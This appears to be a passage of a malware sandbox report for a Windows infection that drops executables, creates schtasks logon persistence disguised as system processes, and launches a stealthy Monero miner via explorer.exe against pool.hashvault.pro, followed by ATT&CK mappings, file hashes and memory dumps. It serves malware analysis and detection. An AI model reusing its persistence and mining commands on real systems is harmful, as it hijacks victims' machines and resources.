"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1684

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:340

C:\fonthostSvc\fonthostSvcIntodhcp.exe
"C:\fonthostSvc\fonthostSvcIntodhcp.exe"
5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\System32\wbem\nci\WMIADAP.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1768

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\twain_32\explorer.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\SysWOW64\KBDROST\cmd.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1940

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\dwm.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1580

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\System32\C_866\taskhost.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1804

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:1568

C:\MSOCache\All Users\dwm.exe
"C:\MSOCache\All Users\dwm.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Users\Admin\AppData\Roaming\etc.exe
C:\Users\Admin\AppData\Roaming\etc.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:1456

C:\Users\Admin\AppData\Roaming\services32.exe
"C:\Users\Admin\AppData\Roaming\services32.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
4⤵
PID:1836

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:1424

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:948

C:\Users\Admin\AppData\Roaming\xmr.exe
C:\Users\Admin\AppData\Roaming\xmr.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:1712

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:804

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:512

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:920

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1492

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\dwm.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\MSOCache\All Users\dwm.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
d474de575c39b2d39c8583c5c065498a

SHA1
5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

SHA256
7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

SHA512
7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
9957b5416f7df4730175f4431e3ec3bb

SHA1
46f8a6512ab3b74193b2430bf012de089dbd91ff

SHA256
6ff4153467bfa703c0cdb65b6ebfb5579aa152d9ce7ad4617b57ac6bf1d5ba9d

SHA512
6db4adb54b62b63b77c146806c0e3bb78154f2fe3ccf36d0b46264dc2b4618c3aa74bd6dc11a942093e05afa9b155a9568da7c9bee07895905c2661ed59c0d1c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
468b7619b5a8af699a133b7ee2c82e23

SHA1
2275492369fbd85b98aabeec27a59554c92a2a6d

SHA256
26bc1d832eae3c001f348498276a2fd0d1d47b5e0ba0b6e70c5e10635fd0a041

SHA512
375dc15875e6eb240732080fe1fdee0423c458019238d0d8f31bd08b8bbef490a5dbca83f2785a5bd7f81487f7cb0a0b054a59476b7b53d120cdc32898223289

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
MD5
c6285451c9d7d6e7ae818083ccfb9023

SHA1
f3b7777c9d42665a549c404fcae4b15e0a1603c2

SHA256
d5a46974275cb760470d73c410956a4bc1edc0ae37e39b3afbd390ae51f2abbb

SHA512
afff1923bf7d273fd1f06575f0e7d6f53d1f5f07428ad389d50e22af4dd0a1ce0c1b24e89508010386e66a19b61fe4b742f5981b081dc3337635360a3e891f00

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
C:\fonthostSvc\5R3FFGftzpp.vbe
MD5
cb60c41590dc32740e8923ba0cb6df97

SHA1
aabc007b611df20e79fceee539ef63e7f2754304

SHA256
c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2

SHA512
a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da

Download Submit
C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
MD5
7245c594f9448bae4a79764fb6897e25

SHA1
1eb300765111494f6c7049b5abbbb0e5725b39aa

SHA256
4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5

SHA512
26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
C:\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
\Users\Admin\AppData\Roaming\Dcr.exe
MD5
975a0ad02701f9f528784dee5a9728d2

SHA1
8a3b57da095dd6fc9d61fe004c1025d929370515

SHA256
b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b

SHA512
6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
89c453dbd36f561195de8e5c5dce77a0

SHA1
8cc44dd7646ec89b6c22214614a8cab158e47f0c

SHA256
ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d

SHA512
c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
7059ba6625325156b764224d2b2dbd83

SHA1
4cc34def0b7d39b913559f539e6d58a3e363f2e3

SHA256
04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608

SHA512
ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506

Download Submit
\Users\Admin\AppData\Roaming\etc.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
\Users\Admin\AppData\Roaming\services32.exe
MD5
b07420edcab9bae1bb3fe4befc7ee57c

SHA1
41ae0d56b863d8155865548e8231e1994e197c21

SHA256
2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639

SHA512
584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5

Download Submit
\Users\Admin\AppData\Roaming\services64.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
\Users\Admin\AppData\Roaming\xmr.exe
MD5
f99c879d74bf1355905734a411191276

SHA1
103a41ade035585e4834f7b939e15608fb64d201

SHA256
eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe

SHA512
e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4

Download Submit
\fonthostSvc\fonthostSvcIntodhcp.exe
MD5
8cf49d252229ed14a26b9a2b45771e1d

SHA1
d53682e13e1f6a1a619c0d1780d86479d388bf0c

SHA256
45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f

SHA512
808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a

Download Submit
memory/340-82-0x0000000000000000-mapping.dmp

Download
memory/512-129-0x0000000000000000-mapping.dmp

Download
memory/576-84-0x0000000000000000-mapping.dmp

Download
memory/576-87-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/576-89-0x000000001AE90000-0x000000001AE92000-memory.dmp

Filesize
8KB

Download
memory/804-128-0x0000000000000000-mapping.dmp

Download
memory/836-62-0x0000000000000000-mapping.dmp

Download
memory/920-132-0x0000000000000000-mapping.dmp

Download
memory/920-145-0x000000001BC10000-0x000000001BC12000-memory.dmp

Filesize
8KB

Download
memory/920-135-0x000000013FD90000-0x000000013FD91000-memory.dmp

Filesize
4KB

Download
memory/948-141-0x000000013F930000-0x000000013F931000-memory.dmp

Filesize
4KB

Download
memory/948-137-0x0000000000000000-mapping.dmp

Download
memory/948-155-0x000000001ACB0000-0x000000001ACB2000-memory.dmp

Filesize
8KB

Download
memory/1092-91-0x0000000000000000-mapping.dmp

Download
memory/1100-60-0x00000000757D1000-0x00000000757D3000-memory.dmp

Filesize
8KB

Download
memory/1228-70-0x000000013F320000-0x000000013F321000-memory.dmp

Filesize
4KB

Download
memory/1228-65-0x0000000000000000-mapping.dmp

Download
memory/1228-112-0x0000000002030000-0x0000000002032000-memory.dmp

Filesize
8KB

Download
memory/1228-106-0x0000000000C00000-0x0000000000C06000-memory.dmp

Filesize
24KB

Download
memory/1424-130-0x0000000000000000-mapping.dmp

Download
memory/1456-110-0x0000000000000000-mapping.dmp

Download
memory/1492-152-0x00000001402EB66C-mapping.dmp

Download
memory/1492-151-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1492-153-0x0000000000270000-0x0000000000290000-memory.dmp

Filesize
128KB

Download
memory/1492-158-0x0000000000680000-0x00000000006A0000-memory.dmp

Filesize
128KB

Download
memory/1492-154-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1492-157-0x00000000003D0000-0x00000000003F0000-memory.dmp

Filesize
128KB

Download
memory/1492-156-0x00000000003D0000-0x00000000003F0000-memory.dmp

Filesize
128KB

Download
memory/1520-104-0x000000001AA10000-0x000000001AA12000-memory.dmp

Filesize
8KB

Download
memory/1520-102-0x0000000000410000-0x0000000000415000-memory.dmp

Filesize
20KB

Download
memory/1520-96-0x0000000000000000-mapping.dmp

Download
memory/1520-99-0x0000000001340000-0x0000000001341000-memory.dmp

Filesize
4KB

Download
memory/1520-103-0x0000000000430000-0x0000000000432000-memory.dmp

Filesize
8KB

Download
memory/1520-101-0x000000001B320000-0x000000001B322000-memory.dmp

Filesize
8KB

Download
memory/1568-95-0x0000000000000000-mapping.dmp

Download
memory/1580-93-0x0000000000000000-mapping.dmp

Download
memory/1684-78-0x0000000000000000-mapping.dmp

Download
memory/1712-109-0x0000000000000000-mapping.dmp

Download
memory/1768-90-0x0000000000000000-mapping.dmp

Download
memory/1796-143-0x0000000002320000-0x0000000002322000-memory.dmp

Filesize
8KB

Download
memory/1796-121-0x000000013F1B0000-0x000000013F1B1000-memory.dmp

Filesize
4KB

Download
memory/1796-115-0x0000000000000000-mapping.dmp

Download
memory/1804-94-0x0000000000000000-mapping.dmp

Download
memory/1836-127-0x0000000000000000-mapping.dmp

Download
memory/1836-108-0x0000000000000000-mapping.dmp

Download
memory/1844-107-0x0000000000000000-mapping.dmp

Download
memory/1932-144-0x000000001B200000-0x000000001B202000-memory.dmp

Filesize
8KB

Download
memory/1932-122-0x000000013F2D0000-0x000000013F2D1000-memory.dmp

Filesize
4KB

Download
memory/1932-116-0x0000000000000000-mapping.dmp

Download
memory/1940-92-0x0000000000000000-mapping.dmp

Download
memory/1948-68-0x0000000000000000-mapping.dmp

Download
memory/1948-111-0x000000001C830000-0x000000001C832000-memory.dmp

Filesize
8KB

Download
memory/1948-105-0x0000000000560000-0x0000000000569000-memory.dmp

Filesize
36KB

Download
memory/1948-74-0x000000013F720000-0x000000013F721000-memory.dmp

Filesize
4KB

Download